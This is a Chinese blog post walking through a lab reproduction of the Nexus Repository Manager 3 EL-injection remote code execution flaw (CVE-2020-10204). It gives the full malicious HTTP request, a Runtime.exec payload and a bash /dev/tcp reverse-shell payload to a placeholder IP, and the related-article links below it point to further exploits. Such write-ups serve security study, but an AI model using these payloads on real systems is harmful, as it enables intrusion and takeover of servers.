nexus 命令执行 (CVE-2020-10204)复现

最新推荐文章于 2024-05-23 18:47:59 发布
最新推荐文章于 2024-05-23 18:47:59 发布
阅读量1.4k 收藏 2
点赞数 3
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127630263
版权

漏洞描述

Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。

漏洞影响

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

漏洞复现

1、访问靶场IP 点击Sign进行登录 admin admin

2、抓包获取登录后的cookie及csrf属性。

3、改包,通过"memberNames"中3个233相乘的命令能否执行来判断漏洞存在

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 靶场ip:端口
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: 靶场ip:端口
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: 靶场ip:端口
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close    

{
  "name": "internal",
  "online": true,
  "storage":
 {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group":
 {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

上面数据包中的NX-ANTI-CSRF-TOKEN 和Cookie 的值修改为第2步中所抓数据包中对应的值。

可以看到命令被成功执行了。

4、将"memberNames"中的值改成命令执行的pyload,再次放包,下图中这个情况说明命令被成功执行了。

A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}

但是换成ls /tmp 之后,命令执行的结果并不会回显在返回的数据包中,所以想要获得flag,最方便的还是反弹shell了。

5、将命令修改为反弹shell的命令,VPS进行监听。

"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash>&/dev/tcp/IP/8888<&1')}"

6、反弹成功 ls /tmp获取flag。

恸.283
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HW漏洞集合(四)-ecology&nexus-yaml版
HWHXY的博客
04-14 1671
HW漏洞集合(四)-ecology&nexus-yaml版 主要是ecology、nexus 31.ecology syncuserinfo sqli name: poc-yaml-ecology-syncuserinfo-sqli set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: GET path: >- /mobile/plugin/SyncUserIn
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204),CVE-2020-11444 越权漏洞
weixin_44508748的博客
11-21 1792
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。 CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。 CVE-2020-10204Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析
爱国小白帽
04-07 1668
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x ...
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2020-10204 漏洞复现
ADummy的博客
03-03 564
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204) by ADummy 0x00利用路线 ​ 登录抓包—>获取cookie和csrf token—>burpsuite发包—>命令执行 0x01漏洞介绍 ​ Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
ch258563的博客
06-06 1519
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)
weixin_34710938的博客
02-26 549
0x00 前言在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑$\\A{''.getClass().forName('java.lang.Runtime').getMeth...
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204
EC_Carrot的博客
07-15 345
漏洞复现 Nexus Repository Manager 3的3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过 该漏洞需要访问更新角色或创建角色接口,所以我们需要登陆后台 登陆后台后获取当前Cookie和CSRF Token,并修改以下包: POST /service/extdirect HTTP/1.1 Host: your_ip:8081 Content-Length: 223 X-Requested-With: XMLHttpRequest X-
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 7154
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
最新发布
0xSec
05-23 830
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞。
CVE-2020-16875复现
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后,您需要在合适的环境中执行该代码。请确保您已经具备合适的权限,并且在测试环境中进行操作,以避免对真实系统造成损坏。 3. 执行POC代码后,它将尝试利用CVE-2020-16875漏洞攻击Microsoft Exchange Server。该漏洞允许远程攻击者在受影响的Exchange Server上执行任意代码。 4. 在执行POC代码之前,请确保已经阅读并理解了漏洞的风险和影响。同时,建议您在测试环境中进行演示,以避免对生产环境造成任何损害。 请注意,由于该漏洞可能导致严重的安全问题,建议您在使用POC代码或尝试复现漏洞之前,与您的系统管理员或安全团队进行协商和了解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值